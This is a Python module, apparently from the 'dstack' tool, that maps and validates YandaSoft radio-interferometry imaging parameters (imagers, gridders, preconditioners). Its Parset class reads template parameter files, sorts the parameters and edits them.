_SUPPORTED_PRECONDITIONERS = ['Wiener','GaussianTaper']
#Some default parameters
global _DEFAULT_IMAGER
global _DEFAULT_IMAGE_NAMES
global _DEFAULT_GRIDDER_NAME
global _DEFAULT_PRECONDITIONER
_DEFAULT_IMAGER = 'Cimager'
_DEFAULT_IMAGE_NAMES = 'image.dstack.test'
_DEFAULT_GRIDDER_NAME = 'WProject'
_DEFAULT_PRECONDITIONER = []
#Globals defining the compatibility of different Preconditioners
global _FORBIDDEN_WITH_NO_PRECONDITIONING
global _WIENER_FORBIDDEN_PARAMS
global _GAUSSIANTAPER_FORBIDDEN_PARAMS
_FORBIDDEN_WITH_NO_PRECONDITIONING = ['Preservecf', 'PGaussianTaper']
_WIENER_FORBIDDEN_PARAMS = ['PWnoisepower', 'PWnormalise', 'PWrobustness', 'PWtaper']
_GAUSSIANTAPER_FORBIDDEN_PARAMS = ['PGTisPsfSize', 'PGTtolerance']
#Globals defining the compatibility of different gridders
global _COPLANAR_FORBIDDEN_PARAMS
global _NON_ANTIALIASING_FORBIDDEN_PARAMS
#Forbidden for gridders not taking the w-term into account
#Basically everything except WProject and Wstack (currently including parameters supporting Non-linear sampling in w-space)
_COPLANAR_FORBIDDEN_PARAMS = ['GNwmax', 'GNwmaxclip', 'GNnwplanes', 'GNwstats', 'GNwsampling', 'GNWexponent', 'GNWnwplanes50',
'GNWexport', 'GNcutoff', 'GNCabsolute', 'GNoversample', 'GNmaxsupport', 'GNlimitsupport',
'GNvariablesupport', 'GNoffsetsupport', 'GNtablename', 'GNusedouble', 'GNsharecf']
_NON_ANTIALIASING_FORBIDDEN_PARAMS = ['GNalpha'] #Forbidden params for everything except SphFunc and WProject
#=== Functions ===
def list_supported_parset_settings():
"""List the ``YandaSoft`` parset settings that are currently supported by ``dstack``.
This function uses logger level INFO to return the supported settings
Parameters
==========
Returns
=======
Prints out the supported settings: log
"""
print_support = lambda functionality, flist: log.info('Supported {0:s}: '.format(functionality) + ' '.join(map(str, flist)))
log.info('Settings for YandaSoft parsets supported by the dstack wrapper:')
print_support('Imagers',_SUPPORTED_IMAGERS)
print_support('Solvers',_SUPPORTED_SOLVERS)
print_support('Gridders',_SUPPORTED_GRIDDER_NAMES)
print_support('Preconditioners',_SUPPORTED_PRECONDITIONERS)
def create_parset_mapping(image_names=_DEFAULT_IMAGE_NAMES, gridder_name=_DEFAULT_GRIDDER_NAME):
"""This function creates a mapping between the ``dstack`` and ``YandaSoft`` parset variables.
The imager used is not included in the ``YandaSoft`` variables. However, when reading in a template parset
using the ``__init__()`` method of the Parset class, the imager name have to be included in the parset file.
This solution gives more flexibility with reading and creating parsets. The list of supported imagers:
- Cimager
- Cdeconvolver
And for reading the template parset, a special imager name is allowed: dstack (not allowed for creating parsets)
This function however, just defines the mapping between the ``dstack`` and ``YandaSoft`` and thus can be used to
overwrite an existing mapping of a ``Parset``. This is useful when a ``Parset`` has already created from a template,
but we want to modify some values and create a parset that uses a different imager.
Currently not all parset parameters are supported.
e.g. only the Clean solvers are supported in the current version of ``dstcak``
The mapping uses the ``Python 3.7+`` feature that dictionaries sorted as they created.
I.e. the mapping is sorted as it is hard-coded in this function!
Parameters
==========
image_names: str, optional
The ``Names`` parameter of ``YandaSoft`` imager task. The code *currelntly not supporting a list of Names only a single Name can be used*!
gridder_name: str, optional
The ``gridder`` parameter of ``YandaSoft`` imager task.
Returns
=======
parset_mapping: dict
The dictionary that is the mapping between the ``dstack`` and ``YandaSoft`` parset variables
inverse_parset_mapping: dict
Inverse dictionary of ``parset_mapping``
"""
parset_mapping = {
#Basic parameters
'dataset': 'dataset',
'grid' : 'grid',
'psfgrid' : 'psfgrid',
'pcf' : 'pcf',
'imagetype' : 'imagetype',
'nworkergroups' : 'nworkergroups',
'nchanpercore' : 'nchanpercore',
'Channels' : 'Channels',
'Frequencies' : 'Frequencies',
'beams' : 'beams',
'nwriters' : 'nwriters',
'freqframe' : 'freqframe',
'singleoutputfile' : 'singleoutputfile',
'solverpercore' : 'solverpercore',
'datacolumn' : 'datacolumn',
'sphfuncforpsf' : 'sphfuncforpsf',
'calibrate' : 'calibrate',
'Cscalenoise' : 'calibrate.scalenoise',
'Callowflag' : 'calibrate.allowflag',
'Cignorebeam' : 'calibrate.ignorebeam',
'gainsfile' : 'gainsfile',
'residuals' : 'residuals',
'restore' : 'restore',
'nUVWMachines' : 'nUVWMachines',
'uvwMachineDirTolerance' : 'uvwMachineDirTolerance',
'MaxUV' : 'MaxUV',
'MinUV' : 'MinUV',
'usetmpfs' : 'usetmpfs',
'tmpfs' : 'tmpfs',
'rankstoringcf' : 'rankstoringcf',
'visweights' : 'visweights',
'VMFSreffreq' : 'visweights.MFS.reffreq',
'ncycles' : 'ncycles',
'sensitivityimage' : 'sensitivityimage',
'Scutoff' : 'sensitivityimage.cutoff',
'channeltolerance' : 'channeltolerance',
'dumpgrids' : 'dumpgrids',
'memorybuffers' : 'memorybuffers',
#Images settings
'Ireuse' : 'Images.reuse',
'Ishape' : 'Images.shape',
'Idirection' : 'Images.direction',
'Icellsize' : 'Images.cellsize',
'IwriteAtMajorCycle' : 'Images.writeAtMajorCycle',
'IrestFrequency' : 'Images.restFrequency',
'INames' : 'Images.Names',
'INnchan' : 'Images.{0:s}.nchan'.format(image_names),
'INfrequency' : 'Images.{0:s}.frequency'.format(image_names),
'INdirection' : 'Images.{0:s}.direction'.format(image_names),
'INtangent' : 'Images.{0:s}.tangent'.format(image_names),
'INewprojection' : 'Images.{0:s}.ewprojection'.format(image_names),
'INshape' : 'Images.{0:s}.shape'.format(image_names),
'INcellsize' : 'Images.{0:s}.cellsize'.format(image_names),
'INnfacets' : 'Images.{0:s}.nfacets'.format(image_names),
'INpolarisation' : 'Images.{0:s}.polarisation'.format(image_names),
'INnterms' : 'Images.{0:s}.nterms'.format(image_names),
'INfacetstep' : 'Images.{0:s}.facetstep'.format(image_names),
#Gridding setup
'gridder' : 'gridder',
'Gpadding' : 'gridder.padding',
'Galldatapsf' : 'gridder.alldatapsf',
'Goversampleweight' : 'gridder.oversampleweight',
'GMaxPointingSeparation' : 'gridder.MaxPointingSeparation',
'Gsnapshotimaging' : 'gridder.snapshotimaging',
'GSwtolerance' : 'gridder.snapshotimaging.wtolerance',
'GSclipping' : 'gridder.snapshotimaging.clipping',
'GSweightsclipping' : 'gridder.snapshotimaging.weightsclipping',
'GSreprojectpsf' : 'gridder.snapshotimaging.reprojectpsf',
'GScoorddecimation' : 'gridder.snapshotimaging.coorddecimation',
'GSinterpmethod' : 'gridder.snapshotimaging.interpmethod',
'GSlongtrack' : 'gridder.snapshotimaging.longtrack',
'Gbwsmearing' : 'gridder.bwsmearing',
'GBchanbw' : 'gridder.bwsmearing.chanbw',
'GBnsteps' : 'gridder.bwsmearing.nsteps',
'Gparotation' : 'gridder.parotation',
'GPangle' : 'gridder.parotation.angle',
'Gswappols' : 'gridder.swappols',
'GNwmax' : 'gridder.{0:s}.wmax'.format(gridder_name),
'GNwmaxclip' : 'gridder.{0:s}.wmaxclip'.format(gridder_name),
'GNnwplanes' : 'gridder.{0:s}.nwplanes'.format(gridder_name),
'GNwstats' : 'gridder.{0:s}.wstats'.format(gridder_name),
'GNalpha' : 'gridder.{0:s}.alpha'.format(gridder_name),
'GNwsampling' : 'gridder.{0:s}.wsampling'.format(gridder_name),
'GNWexponent' : 'gridder.{0:s}.wsampling.exponent'.format(gridder_name),
'GNWnwplanes50' : 'gridder.{0:s}.wsampling.nwplanes50'.format(gridder_name),
'GNWexport' : 'gridder.{0:s}.wsampling.export'.format(gridder_name),
'GNcutoff' : 'gridder.{0:s}.cutoff'.format(gridder_name),
'GNCabsolute' : 'gridder.{0:s}.cutoff.absolute'.format(gridder_name),
'GNoversample' : 'gridder.{0:s}.oversample'.format(gridder_name),
'GNmaxsupport' : 'gridder.{0:s}.maxsupport'.format(gridder_name),
'GNlimitsupport' : 'gridder.{0:s}.limitsupport'.format(gridder_name),
'GNvariablesupport' : 'gridder.{0:s}.variablesupport'.format(gridder_name),
'GNoffsetsupport' : 'gridder.{0:s}.offsetsupport'.format(gridder_name),
'GNtablename' : 'gridder.{0:s}.tablename'.format(gridder_name),
'GNusedouble' : 'gridder.{0:s}.usedouble'.format(gridder_name),
'GNsharecf' : 'gridder.{0:s}.sharecf'.format(gridder_name),
#Deconvolutoin solver
'solver' : 'solver',
'Cverbose' : 'solver.Clean.verbose',
'Ctolerance' : 'solver.Clean.tolerance',
'Cweightcutoff' : 'solver.Clean.weightcutoff',
'Ccweightcutoff' : 'solver.Clean.weightcutoff.clean',
'Calgorithm' : 'solver.Clean.algorithm',
'Cscales' : 'solver.Clean.scales',
'Cniter' : 'solver.Clean.niter',
'Cgain' : 'solver.Clean.gain',
'Cbeam' : 'solver.Clean.beam',
'Cspeedup' : 'solver.Clean.speedup',
'Cpadding' : 'solver.Clean.padding',
'Csolutiontype' : 'solver.Clean.solutiontype',
'Clogevery' : 'solver.Clean.logevery',
'Csaveintermediate' : 'solver.Clean.saveintermediate',
'CBpsfwidth' : 'solver.Clean.psfwidth',
'CBdetectdivergence' : 'solver.Clean.detectdivergence',
'CBorthogonal' : 'solver.Clean.orthogonal',
'CBdecoupled' : 'solver.Clean.decoupled',
'Tminorcycle' : 'threshold.minorcycle',
'Tmajorcycle' : 'threshold.majorcycle',
'Tmasking' : 'threshold.masking',
#Preconditioning
'PNames' : 'preconditioner.Names',
'Preservecf' : 'preconditioner.preservecf',
'PWnoisepower' : 'preconditioner.Wiener.noisepower',
'PWnormalise' : 'preconditioner.Wiener.normalise',
'PWrobustness' : 'preconditioner.Wiener.robustness',
'PWtaper' : 'preconditioner.Wiener.taper',
'PGaussianTaper' : 'preconditioner.GaussianTaper',
'PGTisPsfSize' : 'preconditioner.GaussianTaper.isPsfSize',
'PGTtolerance' : 'preconditioner.GaussianTaper.tolerance',
#Restoring cycles
'Rbeam' : 'restore.beam',
'Rbeamcutoff' : 'restore.beam.cutoff',
'Requalise' : 'restore.equalise',
'Rupdateresiduals' : 'restore.updateresiduals',
'RbeamReference' : 'restore.beamReference'
}
inverse_parset_mapping = {v: k for k, v in parset_mapping.items()}
return parset_mapping, inverse_parset_mapping
#Generate the mapping order:
# A dictionary defines the order of ``dstack`` parset parameters in which they
# written out to prompt or to file.
log.debug('Create _MAPPING_ORDER global variable')
_MAPPING_ORDER = {k: i for i, k in zip(enumerate(create_parset_mapping()[0]),create_parset_mapping()[0])}
#Define ambigous imaging parameters
_AMBIGOUS_IMAGING_PARAMETERS = {'Ishape' : 'INshape',
'Idirection' : 'INdirection',
'Icellsize' : 'INcellsize'}
def check_preconditioner_suppoort(preconditioners=_DEFAULT_PRECONDITIONER):
"""Check if the list of preconditioners given is supported
Parameters
==========
preconditioners: list
A list containing the preconditioners to test
Returns
=======
allowded: bool, optional
True, if the given list contains only allowed preconditioners,
and False if not
"""
if preconditioners == []:
return True
else:
for preconditioner in preconditioners:
if preconditioner not in _SUPPORTED_PRECONDITIONERS:
return False
return True
def check_parameter_and_Imager_compatibility(parset_param, imager=_DEFAULT_IMAGER):
"""This function defines which parameters the supported imagers are not compatible with.
This check returns False if the given parameter is not compatible with the imager
This function is only called when a parset is written to disc. The in-memory parest
can be really messed up for sake of flexibility
Parameters
==========
parset_param: str
The ``dstack`` parset parameter variable name
imager: str, optional
Imager to test against
Returns
=======
Compatibility: bool
True if the parameter is allowed with the given imager,
and False if not
"""
if imager not in _SUPPORTED_IMAGERS:
raise TypeError('Imager {0:s} is not supported!'.format(imager))
if imager == 'Cimager':
forbidden_params = ['grid','psfgrid','pcf']
if parset_param in forbidden_params:
return False
else:
return True
elif imager == 'Cdeconvolver':
forbidden_params = ['dataset']
if parset_param in forbidden_params:
return False
else:
return True
else:
#Everything goes with the dstack imager :O
return True
def check_parameter_and_Preconditioner_compatibility(parset_param, preconditioners=_DEFAULT_PRECONDITIONER):
"""This function defines which parameters the preconditioners used are not compatible with.
This check returns False if the given parameter is not compatible with the preconditioner used.
This function is only called when a parset is written to disc. The in-memory parest
can be really messed up for sake of flexibility.
Parameters
==========
parset_param: str
The ``dstack`` parset parameter variable name
preconditioners: list, optional
This is the list of preconditioners used
Returns
=======
Compatibility: bool
True if the parameter is allowed with the given preconditioner(s),
and False if not
"""
if preconditioners == []:
#The Ppreservecf parameter is allowed due to the misterious ways YandaSoft works...
#However, I decided not to allow any preconditioning-related parameters in this case,
#as this solution allows to make Cdeconvolver running with no-preconditioning option by default
#if the preconditioner is set to []
if parset_param in _FORBIDDEN_WITH_NO_PRECONDITIONING + _WIENER_FORBIDDEN_PARAMS + _GAUSSIANTAPER_FORBIDDEN_PARAMS:
return False
else:
return True
elif 'Wiener' not in preconditioners:
if parset_param in _WIENER_FORBIDDEN_PARAMS:
return False
else:
return True
elif 'GaussianTaper' not in preconditioners:
if parset_param in _GAUSSIANTAPER_FORBIDDEN_PARAMS:
return False
else:
return True
else:
if check_preconditioner_suppoort(preconditioners) == False:
raise TypeError('The preconditioner given is not supported!')
return True
def check_parameter_and_Gridder_compatibility(parset_param, gridder_name=_DEFAULT_GRIDDER_NAME):
"""This function defines which parameters the gridder used not compatible with.
This check returns False if the given parameter is not compatible with the gridder used.
This function is only called when a parset is written to disc. The in-memory parest
can be really messed up for sake of flexibility.
Parameters
==========
parset_param: str
The ``dstack`` parset parameter variable name
gridder_name: str, optional
This is the name of the gridder used
Returns
=======
Compatibility: bool
True if the parameter is allowed with the given gridder(,
and False if not
"""
if gridder_name == 'Box':
if parset_param in _COPLANAR_FORBIDDEN_PARAMS + _NON_ANTIALIASING_FORBIDDEN_PARAMS:
return False
else:
return True
elif gridder_name == 'SphFunc':
if parset_param in _COPLANAR_FORBIDDEN_PARAMS:
return False
else:
return True
elif gridder_name == 'WStack':
if parset_param in _NON_ANTIALIASING_FORBIDDEN_PARAMS:
return False
else:
return True
elif gridder_name == 'WProject':
return True
else:
if gridder_name not in _SUPPORTED_GRIDDER_NAMES:
raise TypeError('The gridder given is not supported!')
return True
#=== CLASSES ===
class Parset(object):
"""Creates an in-memory dictionary of a ``YandaSoft`` parameterset.
It can be initialized as an empty dictionary and then the user can define
*every* parameter. Or a template parset can be used to initialize the
imaging parameters. To build different imaging parsets for pipelines,
the variation of the two methods is advised.
The template parset has to have each parameter in a new line starting with
the ``YandaSoft`` parameter e.g. ``Cimgaer.dataset``, which obviously starts
with the imager name. See the list of imagers supported in ``create_parset_mapping()``
The parameters value is the string after = and a backspace until the end of the line.
Lines starting with ``#`` are skipped.
The mapping between ``dstack`` and ``YandaSoft`` variables is defined by
the dictionary created with ``create_parset_mapping`.
The mapping is an attribute of the ``Parset`` class.
The mapping is based on the ``ASKAPSOFT`` `documentation <https://www.atnf.csiro.au/computing/software/askapsoft/sdp/docs/current/calim/index.html>`_
Though the ``Parset`` class offers a range of flexibility, currently the template parset
have to consist only one Images Names and gridder. These must be specified when creating
a ``Parset`` object and the template have to use the given naming convention in order to
be compatible with the mapping generated.
If no template is given, an empty parset is generated.
Keyword Arguments
=================
imager: str
Have to be a selected ``YandaSoft`` Imager task. When a parset file is created
this attribute is used to define the imager
image_names: str
The ``Names`` parameter of the parset. The template parset has to have this ``Names``
parameters (if used), when read in. Nevertheless, this can be changed on the fly, and
parsets with different names can be created. Use the ``update_parset_mapping()`` function
for this.
gridder_name: str
The ``gridder`` parameter of ``YandaSoft`` imager task.
template_path: str or None, optional
Full path to a template parset file, which can be used to
initialize the parset parameters
preconditioner: list or None, optional
The preconditioner(s) used when saving the parset. The ``Parset`` object is designed to be
flexible, allowing for parameters coexist even if it would make no sense. However, when
saving a Parset, a series of check ensures that the parset is compatible with ``YandaSoft``.
The solution for preconditioning is that the user can define which preconditioner to use
when saving a parset. This argument enable the user to define what preconditioners to use
when saving the parset. If set to None, the preconditioners are read from the template if given.
It creates an empty list if no template is given or if the template defines no preconditioning.
Note, that if the template uses preconditioning not supported by ``dstack``, it will be ignored.
"""
def __init__(self, imager=_DEFAULT_IMAGER, image_names=_DEFAULT_IMAGE_NAMES, gridder_name=_DEFAULT_GRIDDER_NAME, template_path=None, preconditioner=None):
log.debug('Initialize new Parset object:')
object.__setattr__(self, "_parset", {})
if imager not in _SUPPORTED_IMAGERS:
raise TypeError('Imager {0:s} is not supported!'.format(imager))
if gridder_name not in _SUPPORTED_GRIDDER_NAMES:
raise TypeError('Gridder {0:s} is not supported!'.format(gridder_name))
self._imager = imager
self._image_names = image_names
self._gridder_name = gridder_name
#Set up an empty list for ._preconditioner => I will fill this up with the preconditioner from the template file
if preconditioner != None:
if check_preconditioner_suppoort(preconditioner) == False:
raise TypeError('The preconditioner given is not allowed!')
else:
user_defined_preconditioner = True
else:
user_defined_preconditioner = False
self._preconditioner = []
pm, ipm = create_parset_mapping(image_names=self._image_names,gridder_name=self._gridder_name)
object.__setattr__(self,"_mapping", pm)
object.__setattr__(self,"_inverse_mapping", ipm)
if template_path != None:
if os.path.exists(template_path) == False:
raise NameError('Template parset does not exist: {0:s}'.format(template_path))
log.info('Create Parset based on template: {0:s}'.format(template_path))
with open(template_path, 'r') as f:
log.debug('Reading in template Parset file: {0:s}'.format(template_path))
for line in f.readlines():
if line[0] == '#' or line.split() == []:
continue
name = line.split()[0]
#Check if the name starts with a string from the list of supported imagers
if list(filter(name.startswith, _SUPPORTED_IMAGERS)) != []:
name = '.'.join(name.split('.')[1:])#Name without imager
value = line[line.index('= ')+2:].rstrip()#get rid of line separators with .rstrip()
if name not in self._inverse_mapping:
raise TypeError('Can not interpret the parameter {0:s} given in the parset {1:s}!'.format(
name,template_path))
#Some consistency check
if self._inverse_mapping[name] == 'INames':
if self._image_names not in value:
raise NameError('Parsed created with different image names ({0:s}) from that defined in the template parset {1:s}!'.format(
self._image_names,template_path))
if self._inverse_mapping[name] == 'gridder':
if self._gridder_name not in value:
raise NameError('Parsed created with different gridder name ({0:s}) from that defined in the template parset {1:s}!'.format(
self._gridder_name,template_path))
if self._inverse_mapping[name] == 'solver':
if value not in _SUPPORTED_SOLVERS:
raise NameError('The solver defined in the template {0:s} is not supported!'.format(template_path))
if self._inverse_mapping[name] == 'PNames':
valid_preconditioner = False
if ''.join(value.split()) == '[]':
valid_preconditioner = True
else:
for p in _SUPPORTED_PRECONDITIONERS:
if p in value:
valid_preconditioner = True
#Add the preconditioner to the list
self.add_preconditioner(p)
if valid_preconditioner == False:
raise NameError('The preconditioner defined in the template {0:s} is not supported!'.format(
template_path))
self._parset[self._inverse_mapping[name]] = self._preconditioner
continue
self._parset[self._inverse_mapping[name]] = value
log.debug('Parset parameter added: {0:s} = {1:s}'.format(self._inverse_mapping[name],value))
else:
log.warning('Invalid parset parameter: {0:s} as the imager used is {1:s}! (parameter skipped)'.format(
name,self._imager,template_path))
#Set up the Nnames key in the _parameters as it always have to exist in otder to save the Parset with correct preconditioning settings!
if 'PNames' not in self._parset.keys():
self._parset['PNames'] = []
elif isinstance(self._parset['PNames'],list) == False:
self._parset['PNames'] = eval(self._parset['PNames']) #Evaluate string input as a list
#Now I overwrite the ._preconditioner attribute with the preconditioner defined by the user if given
if user_defined_preconditioner == True:
del self._preconditioner
self._preconditioner = preconditioner
#Oreder params according to mapping!
self.sort_parset()
log.info('Parset attributes: imager = {0:s}; image_names = {1:s}; gridder_name = {2:s}; preconditioner = {3:s}'.format(
self._imager, self._image_names, self._gridder_name, str(self._preconditioner)))
else:
self._parset[self._inverse_mapping[self._mapping['INames']]] = self._image_names
self._parset[self._inverse_mapping[self._mapping['gridder']]] = self._gridder_name
log.info('Create Parset without template parset and parameters: Inames = {0:s}; gridder = {1:s}'.format(
self._image_names,self._gridder_name))
log.info('Parset attributes: imager = {0:s}; image_names = {1:s}; gridder_name = {2:s}; preconditioner = {3:s}'.format(
self._imager, self._image_names, self._gridder_name, str(self._preconditioner)))
def add_parset_parameter(self,name,value):
"""Add a new Parset parameter to the _parset attribute
This is the preferred method to add parameters to the parset.
Parameters
==========
name: str
Name of the parameter. Have to be in ``self._mapping`` keys.
value: str (or almost anything)
The value of the parameter. When the ``Parset`` is saved
the value will be converted to a string.
Returns
=======
:obj:`Parset`
The ``_parset`` dict is appended with the ``name`` and ``value``
"""
if name not in set(self._mapping.keys()):
log.info('Skip adding invalid parset paremater: {0:s}'.format(name))
else:
log.debug('Add parset parameter: {0:s}'.format(name))
self._parset[self._inverse_mapping[self._mapping[name]]] = value
def remove_parset_parameter(self,name):
"""Remove a parset parameter from the _parset attribute
This is the preferred method to remove parameters.
Parameters
==========
name: str
Name of the parameter. Have to be in ``self._mapping`` keys.
Returns
=======
:obj:`Parset`
The ``_parset`` dict is without with the element called ``name``
"""
if name not in set(self._mapping.keys()):
log.info('Can not remove invalid parset parameter: {0:s}'.format(name))
else:
try:
del self._parset[name]
log.debug('Parameter removed from parset: {0:s}'.format(name))
except KeyError:
log.info('Parset do not contain parameter: {0:s}'.format(name))
def __setattr__(self, name, value):
"""Add a new key and a corresponding value to the ``Parset``
Parameters
==========
name: str
Name of the parameter. Have to be in ``self._mapping`` keys.
value: str (or almost anything)
The value of the parameter. When the ``Parset`` is saved
the value will be converted to a string.
Returns
=======
:obj:`Parset`
The ``_parset`` dict is appended with the ``name`` and ``value``
"""
custom_attributes = ['_parset', '_imager','_image_names', '_gridder_name','_preconditioner','_mapping','_inverse_mapping']
if name in custom_attributes:
object.__setattr__(self, name, value)
else:
self.add_parset_parameter(name,value)
def __repr__(self):
"""Return the ``_parset`` dict as a line-by line string of keys and values."""
self.sort_parset() #To make it fancy and slow :O
lines = 'Imager: {0:s}\n'.format(self._imager)
lines += 'Image Names: {0:s}\n'.format(self._image_names)
lines += 'Preconditioner: {}\n'.format(self._preconditioner)
lines += 'Parset parameters:\n{\n'
for key, value in self._parset.items():
lines += '\t{} = {}\n'.format(key, value)
lines += '}'
return lines
def set_image_names_param_consistency(self,param,use_image_names=False):
"""When saving a parset, ambigous Images parameters should not be allowed.
However, some parameters of Images can be defined two ways:
a) ``Images.parameter``
b) ``Images.image_name.parameter``
The ``Parset`` calls allows the user to define both parameters,
for flexibility. Nevertheless, in saving the parset the parameters
should be consistent.
This function checks for consistency in the ambigous parameters
of the Images.parameters and if the parameter is ambigous it
returns the name defined by either a) or b) options.
I.e. The function takes a key and if it is ambigous it returns
the key of the user-defined key which corresponding value should be used
for both parameters when writing out the parameters
This function uses the ``_AMBIGOUS_IMAGING_PARAMETERS`` dictionary
to check if the parameter given is really ambigous.
Parameters
==========
param: str
The parameter name in the mapping that ambiguity should be checked.
If not in ``_AMBIGOUS_IMAGING_PARAMETERS``, the function returns this parameter
use_image_names: bool
If True, the default parameters used when saving a dataset, is defined by the
``Images.parameter``. If Flase, the true values are defined by ``Images.image_name.parameter``.
Returns
=======
disambigous_param: str
The parameter in the mapping which value should be used if the input is ambigous.
This can be identical to the input parameter.
"""
if param in _AMBIGOUS_IMAGING_PARAMETERS.keys():
if _AMBIGOUS_IMAGING_PARAMETERS[param] not in self._parset.keys():
return param
elif self._parset[_AMBIGOUS_IMAGING_PARAMETERS[param]] == self._parset[param]:
return param
else:
if use_image_names:
return _AMBIGOUS_IMAGING_PARAMETERS[param]
else:
return param
elif param in _AMBIGOUS_IMAGING_PARAMETERS.values():
inverse_ambigous_mapping = {v: k for k, v in _AMBIGOUS_IMAGING_PARAMETERS.items()}
if inverse_ambigous_mapping[param] not in self._parset.keys():
return param
elif self._parset[inverse_ambigous_mapping[param]] == self._parset[param]:
return param
else:
if use_image_names:
return param
else:
return inverse_ambigous_mapping[param]
else:
return param
def check_if_parset_sorted(self):
"""This function checks if the ._parset dictionary is sorted by the global _MAPPING_ORDER or not.
Parameters
==========
Returns
=======
sorted: bool
True, if the ._parset dictionary is sorted and False if not
"""
last_key_val = _MAPPING_ORDER[list(self._parset.keys())[0]]
for k in list(self._parset.keys()):
#print(self._mapping_order[k])
if _MAPPING_ORDER[k] < last_key_val:
return False
else:
last_key_val = _MAPPING_ORDER[k]
return True
def sort_parset(self):
"""Sort the ._parset dictionary based on the ._mapping_oder parameter
This is a crucial function, especially when saving parsets as this bit of code
assures that the parset saved have the parameters in a logical order.
Parameters
==========
Returns
=======
:obj: `Parset`
With updated ._parset dictionary if needed. Note that the ._parset attribute
is deleted and re-created within this function!
"""
if not self.check_if_parset_sorted():
log.debug('Sort parset parameters.')
#Create a sorted list of the mapping keys where the keys not defined int the Parset are set to None
sorted_keys = [k if k in self._parset.keys() else None for k, v in sorted(_MAPPING_ORDER.items(), key=lambda item: item[1])]
#Remove Nones
sorted_keys = [k for k in sorted_keys if k != None]
#Sorted keys and values given in a list format
parset_buffer = sorted(self._parset.items(), key=lambda pair: sorted_keys.index(pair[0]))
#Re-define ._parset where the sorting order will be determined by the order of parameters defined
del self._parset
object.__setattr__(self, "_parset", {})
for item in parset_buffer:
self._parset[item[0]] = item[1]
del parset_buffer
else:
log.debug('Parset parameters are already sorted!')
def update_parset_mapping(self, image_names=_DEFAULT_IMAGE_NAMES, gridder_name=_DEFAULT_GRIDDER_NAME):
"""Update the mapping used between the ``dstack`` and ``YandaSoft`` parset variables.
It also updates the parameters defined. Therefore, ths function supposed to be used when
one wants to change the attributes affecting the mapping, as this keeps everything consistent.
Note, that the preconditioner is not updated, as all supported preconditioners are included in the
default mapping!
Parameters
==========
image_names: str, optional
The ``Names`` parameter of the parset. The template parset has to have this ``Names``
parameters (if used), when read in. Nevertheless, this can be changed on the fly, and
parsets with different names can be created. Use the ``update_parset_mapping()`` function
for this.
gridder_name: str, optional
The ``gridder`` parameter of ``YandaSoft`` imager task.
Returns
=======
:obj:`Parset`
With updated mapping and associated attributes
"""
log.info('Update Parset mapping using image_names = {0:s} and gridder = {1:s}'.format(image_names,gridder_name))
self._image_names = image_names
self._gridder_name = gridder_name
pm, ipm = create_parset_mapping(image_names=self._image_names,
gridder_name=self._gridder_name)
#NOTE that the ordering is not updated!
self._mapping = pm
self._inverse_mapping = ipm
#Also update the INames and gridder values in ._parset
self._parset['INames'] = str([self._image_names])
self._parset['gridder'] = str(self._gridder_name)
def update_image_names(self, image_names=_DEFAULT_IMAGE_NAMES):
"""Update the INames parameter and also the mapping. Basically calls
``update_parset_mapping()`` but only update Inames.
Parameters
==========
image_names: str, optional
The ``Names`` parameter of the parset. The template parset has to have this ``Names``
parameters (if used), when read in. Nevertheless, this can be changed on the fly, and
parsets with different names can be created. Use the ``update_parset_mapping()`` function
for this.
Returns
=======
:obj:`Parset`
With updated Inames and mapping attributes
"""
self.update_parset_mapping(image_names=image_names,gridder_name=self._gridder_name)
def update_gridder(self, gridder_name=_DEFAULT_GRIDDER_NAME):
"""Update the gridder parameter and also the mapping. Basically calls
``update_parset_mapping()`` but only update the gridder.
Parameters
==========
gridder_name: str, optional
The ``gridder`` parameter of ``YandaSoft`` imager task.
Returns
=======
:obj:`Parset`
With updated gridder and mapping attributes
"""
self.update_parset_mapping(image_names=self._image_names,gridder_name=gridder_name)
def update_imager(self, imager):
"""Go-to routine when updating the imager.
Parameters
==========
imager: str
Have to be a selected ``YandaSoft`` Imager task. When a parset file is created
this attribute is used to define the imager
Returns
=======
:obj:`Parset`
With updated imager attribute
"""
if imager not in _SUPPORTED_IMAGERS:
raise NameError('Imager {0:s} is not supported!'.format(imager))
log.info('Update Parset imager to {0:s}'.format(imager))
self._imager = imager
def add_preconditioner(self,preconditioner):
"""Add a new preconditioner to the _preconditioner attribute
If the given preconditioner is already used, it won't be duplicated again
Parameters
==========
preconditioner: str
A valid (supported) preconditioner that will be added to the
list of preconditioners inspected when saving a parset
Returns
=======
:obj:`Parset`
With an extra preconditioner in the _preconditioner attribute
"""
if preconditioner not in _SUPPORTED_PRECONDITIONERS:
raise NameError('Preconditioner {0:s} is not supported!'.format(preconditioner))
if preconditioner not in self._preconditioner:
log.info("Preconditioner '{0:s}' added to Parset preconditioners".format(preconditioner))
self._preconditioner.append(preconditioner)
def remove_preconditioner(self,preconditioner):
"""Remove the given preconditioner from the _preconditioner list attribute
If the given preconditioner is not in the list nothing happens
Parameters
==========
preconditioner: str
A valid (supported) preconditioner that will be removed from the
list of preconditioners inspected when saving a parset
Returns
=======
:obj:`Parset`
Withouth the removed preconditioner in the _preconditioner attribute
"""
if preconditioner not in _SUPPORTED_PRECONDITIONERS:
raise NameError('Preconditioner {0:s} is not supported!'.format(preconditioner))
if preconditioner in self._preconditioner:
log.info("Preconditioner '{0:s}' removed from Parset preconditioners".format(preconditioner))
self._preconditioner.remove(preconditioner)
def update_preconditioner(self,preconditioners):
"""Update the _preconditioner list attribute with the
given list of preconditioners.
Parameters
==========
preconditioners: list
List of valid (supported) preconditioners that will be used as the new _preconditioner list
Returns
=======
:obj:`Parset`
With updated _preconditioner attribute
"""
if preconditioners != []:
for preconditioner in preconditioners:
if preconditioner not in _SUPPORTED_PRECONDITIONERS:
raise NameError('Preconditioner {0:s} is not supported!'.format(preconditioner))
log.info('Update preconditioner to: {0:s}'.format(str(preconditioners)))
self._preconditioner = preconditioners
def special_setup_for_saving_parsets(self):
"""There are some caveats when using the ``Preconditioner`` class as it is so versatile.
``YandaSoft`` on the other hand have some tricky restrictions. To accommodate special cases, this
function is used as the last step when a parset is saved to a file.
Currently there are one special cases:
- When WProject gridder used jointly with Wiener filtering the parameter Preservecf has to be set to \
True, in order to compute the PCF. This is extremely important when the dumpgrid parameter is set to true, \
as only in this case the correct PCF is dumped.
So this function is basically secure that these special cases are met when a parset is written.
Parameters
==========
Returns
=======
:obj:`Parset`
With updated attributes to make sure ``YandaSoft`` returns the expected results
"""
if self._gridder_name == 'WProject' and 'Wiener' in self._preconditioner:
if 'Preservecf' not in self._parset.keys() or self._parset['Preservecf'] == 'False':
self.add_parset_parameter('Preservecf','True')
return True
